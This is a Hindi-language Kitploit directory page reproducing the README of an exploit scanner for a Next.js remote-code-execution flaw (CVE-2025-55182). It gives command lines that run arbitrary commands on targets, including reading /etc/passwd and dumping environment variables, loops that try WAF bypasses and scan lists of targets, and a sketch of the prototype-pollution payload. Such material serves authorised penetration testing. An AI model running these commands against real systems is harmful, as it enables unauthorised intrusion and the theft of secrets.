Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell-CVE-2025-55182-Advanced-Scanner — Next.js में CVE-2025-55182 RCE के लिए स्वचालित स्कैनर, जिसमें 8 WAF बायपास तकनीकें, कस्टम कमांड निष्पादन, और अधिकृत पेनेट्रेशन परीक्षण के लिए केवल-परीक्षण डिटेक्शन मोड शामिल है। | Kitploit
उपकरण/GitHubGitHub/ysfcndgr/react2shell-cve-2025-55182-advanced-scanner
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubysfcndgr/react2shell-cve-2025-55182-advanced-scanner

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell-CVE-2025-55182-Advanced-Scanner

Next.js में CVE-2025-55182 RCE के लिए स्वचालित स्कैनर, जिसमें 8 WAF बायपास तकनीकें, कस्टम कमांड निष्पादन, और अधिकृत पेनेट्रेशन परीक्षण के लिए केवल-परीक्षण डिटेक्शन मोड शामिल है।

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 उन्नत स्कैनर

Python License Security

Next.js अनुप्रयोगों में CVE-2025-55182 भेद्यता का पता लगाने और उसका शोषण करने के लिए उन्नत पेनेट्रेशन परीक्षण टूल

📋 विषय-सूची अवलोकन

विशेषताएँ

स्थापना

उपयोग

उदाहरण

बायपास तकनीकें

तकनीकी विवरण

अस्वीकरण

योगदान

लाइसेंस

🔍 अवलोकन CVE-2025-55182 एक गंभीर रिमोट कोड एक्सेक्यूशन (RCE) भेद्यता है जो React Server Components के माध्यम से Next.js अनुप्रयोगों को प्रभावित करती है। यह स्कैनर विभिन्न WAF बायपास तकनीकों के साथ इस भेद्यता का पता लगाने और उसका शोषण करने का एक स्वचालित तरीका प्रदान करता है।

CVSS स्कोर: 9.8 (गंभीर)

✨ विशेषताएँ एकाधिक पेलोड वेरिएंट: विभिन्न शोषण पैटर्न

WAF बायपास तकनीकें: 8 अलग-अलग बायपास विधियाँ

कस्टम कमांड निष्पादन: मनमाने सिस्टम कमांड निष्पादित करें

भेद्यता परीक्षण: सुरक्षित पहचान के लिए केवल-परीक्षण मोड

प्रॉक्सी समर्थन: डीबगिंग के लिए प्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें

SSL बायपास: SSL प्रमाणपत्र सत्यापन छोड़ने का विकल्प

पुनः प्रयास तंत्र: विफलता पर स्वचालित पुनः प्रयास

रंगीन आउटपुट: आसानी से पढ़ने योग्य कंसोल इंटरफ़ेस

🚀 स्थापना पूर्वापेक्षाएँ Python 3.6 या उच्चतर

pip पैकेज मैनेजर

root@kitploit:~
# Install dependencies
pip install -r requirements.txt

# Make the script executable (Linux/Mac)
chmod +x scanner.py

Docker स्थापना

root@kitploit:~
# Build Docker image
docker build -t cve-2025-55182-scanner .

# Run with Docker
docker run --rm cve-2025-55182-scanner -h

📖 उपयोग मूल उपयोग

root@kitploit:~
# Show help
python scanner.py -h

# Test a target
python scanner.py -d http://target.com --test-only

# Execute command
python scanner.py -d http://target.com -c "whoami"

कमांड-लाइन विकल्प

📚 उदाहरण मूल शोषण

root@kitploit:~
# Test if target is vulnerable
python scanner.py -d http://vulnapp.com --test-only

# Execute simple command
python scanner.py -d http://target.com -c "id"

# List directory contents
python scanner.py -d https://target.com -c "ls -la" -k

# Read system file
python scanner.py -d http://localhost:3000 -c "cat /etc/passwd"

WAF बायपास उदाहरण

root@kitploit:~
# Use Base64 encoding bypass
python scanner.py -d http://target.com -c "uname -a" -t 2

# Use Unicode encoding
python scanner.py -d https://target.com -c "whoami" -t 3 -k

# Use mixed techniques with proxy
python scanner.py -d http://target.com -c "pwd" -t 4 -p http://127.0.0.1:8080

# Try all techniques automatically
for i in {1..8}; do
    echo "Trying technique $i"
    python scanner.py -d http://target.com -c "hostname" -t $i
    echo ""
done

उन्नत उपयोग

root@kitploit:~
# Test multiple targets from file
for target in $(cat targets.txt); do
    echo "Testing $target"
    python scanner.py -d $target --test-only
done

# Save output to file
python scanner.py -d http://target.com -c "ifconfig" > output.txt

# Use with Burp Suite proxy
python scanner.py -d https://target.com -c "env" -p http://127.0.0.1:8080 -k

🛡️ बायपास तकनीकें स्कैनर में 8 अलग-अलग WAF बायपास तकनीकें शामिल हैं:

डिफ़ॉल्ट पेलोड: मूल शोषण पैटर्न

Base64 एन्कोडिंग: कमांड को Base64 में एन्कोड करें

यूनिकोड एन्कोडिंग: यूनिकोड कैरेक्टर एन्कोडिंग का उपयोग करें

केस हेरफेर: यादृच्छिक केस विविधताएँ

डबल एन्कोडिंग: डबल URL एन्कोडिंग

नल बाइट्स: नल बाइट इंजेक्शन

मिश्रित हेडर: विविध HTTP हेडर

यादृच्छिक विलंब: यादृच्छिक स्लीप अंतराल जोड़ें

प्रत्येक तकनीक को -t फ़्लैग के साथ चुना जा सकता है।

🔧 तकनीकी विवरण भेद्यता की पृष्ठभूमि CVE-2025-55182 Next.js में एक प्रोटोटाइप पोल्यूशन भेद्यता है जो React Server Components के माध्यम से रिमोट कोड एक्सेक्यूशन की ओर ले जाती है। यह भेद्यता हमलावरों को सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है।

पेलोड संरचना यह टूल RCE प्राप्त करने के लिए प्रोटोटाइप पोल्यूशन के साथ विशेष रूप से तैयार multipart/form-data अनुरोध का उपयोग करता है:

प्रोटोटाइप पोल्यूशन: Promise प्रोटोटाइप श्रृंखला को दूषित करता है

कमांड इंजेक्शन: Node.js child_process निष्पादन इंजेक्ट करता है

परिणाम निष्कर्षण: रीडायरेक्ट हेडर के माध्यम से परिणाम निकालता है

पहचान विधि स्कैनर विशेष रूप से तैयार अनुरोध भेजता है और निम्न की तलाश करता है:

कमांड आउटपुट वाले X-Action-Redirect हेडर

सफल शोषण का संकेत देने वाले विशिष्ट प्रतिक्रिया पैटर्न

त्रुटि संदेश जो भेद्यता की उपस्थिति का सुझाव देते हैं

⚠️ अस्वीकरण महत्वपूर्ण: केवल कानूनी और नैतिक उपयोग

यह टूल निम्न के लिए प्रदान किया गया है:

सुरक्षा अनुसंधान और शिक्षा

अधिकृत पेनेट्रेशन परीक्षण

उचित अनुमति के साथ भेद्यता मूल्यांकन

रक्षात्मक सुरक्षा उद्देश्य

इस टूल का उपयोग इनके लिए न करें:

सिस्टम का अनधिकृत परीक्षण

अवैध गतिविधियाँ

दुर्भावनापूर्ण उद्देश्य

सेवा की शर्तों का उल्लंघन

इस टूल का उपयोग करके, आप सहमत होते हैं:

इसका उपयोग केवल उन सिस्टम पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है

सभी लागू कानूनों और विनियमों का पालन करें

अपने कार्यों की पूर्ण जिम्मेदारी स्वीकार करें

किसी भी दुरुपयोग के लिए लेखक को उत्तरदायी न ठहराएँ

🤝 योगदान योगदान का स्वागत है! आप इस प्रकार मदद कर सकते हैं:

समस्याओं की रिपोर्ट करना जाँचें कि क्या समस्या पहले से मौजूद है

विस्तृत पुनरुत्पादन चरण प्रदान करें

त्रुटि संदेश और लॉग शामिल करें

अपने वातावरण का विवरण निर्दिष्ट करें

कोड योगदान रिपॉजिटरी को फोर्क करें

एक फीचर ब्रांच बनाएँ

स्पष्ट कमिट संदेश लिखें

यदि लागू हो तो परीक्षण जोड़ें

पुल रिक्वेस्ट सबमिट करें

फीचर अनुरोध "enhancement" लेबल के साथ GitHub इश्यू के माध्यम से नई सुविधाओं का सुझाव दें।

📄 लाइसेंस यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

MIT लाइसेंस

कॉपीराइट (c) 2025

इसके द्वारा, बिना किसी शुल्क के, इस सॉफ़्टवेयर और संबंधित दस्तावेज़ फ़ाइलों ("सॉफ़्टवेयर") की एक प्रति प्राप्त करने वाले किसी भी व्यक्ति को, बिना किसी प्रतिबंध के सॉफ़्टवेयर से निपटने की अनुमति दी जाती है, जिसमें बिना किसी सीमा के सॉफ़्टवेयर की प्रतियों का उपयोग, प्रतिलिपि बनाने, संशोधित करने, विलय करने, प्रकाशित करने, वितरित करने, उप-लाइसेंस देने और/या बेचने के अधिकार, और उन व्यक्तियों को अनुमति देना शामिल है जिन्हें सॉफ़्टवेयर प्रदान किया गया है, निम्नलिखित शर्तों के अधीन:

उपरोक्त कॉपीराइट नोटिस और यह अनुमति नोटिस सॉफ़्टवेयर की सभी प्रतियों या महत्वपूर्ण भागों में शामिल किए जाएँगे।

सॉफ़्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी प्रकार की वारंटी के, व्यक्त या निहित, जिसमें बिना सीमा के व्यापारिकता, किसी विशेष उद्देश्य के लिए उपयुक्तता और गैर-उल्लंघन की वारंटी शामिल है। किसी भी स्थिति में लेखक या कॉपीराइट धारक किसी भी दावे, क्षति या अन्य दायित्व के लिए उत्तरदायी नहीं होंगे, चाहे वह अनुबंध, टोर्ट या अन्यथा के कार्य में उत्पन्न हो, सॉफ़्टवेयर से या सॉफ़्टवेयर के उपयोग या अन्य लेन-देन से संबंधित हो।

🔗 संदर्भ CVE-2025-55182 आधिकारिक प्रविष्टि

ProjectDiscovery Nuclei टेम्पलेट

Next.js सुरक्षा सलाह

React Server Components दस्तावेज़ीकरण

⭐ स्टार इतिहास यदि आपको यह टूल उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार देने पर विचार करें!

याद रखें: अधिक शक्ति के साथ अधिक जिम्मेदारी आती है। इस टूल का उपयोग नैतिक और कानूनी रूप से करें।

टूल डाउनलोड करें
विकल्पविवरणडिफ़ॉल्ट
-d, --domainलक्ष्य URLhttp://localhost:3000
-c, --commandनिष्पादित करने के लिए कमांडid
-t, --techniqueबायपास तकनीक (1-8)1
-p, --proxyप्रॉक्सी सर्वरNone
-k, --insecureSSL सत्यापन छोड़ेंFalse
--test-onlyकेवल भेद्यता का परीक्षण करेंFalse
-h, --helpसहायता संदेश दिखाएँN/A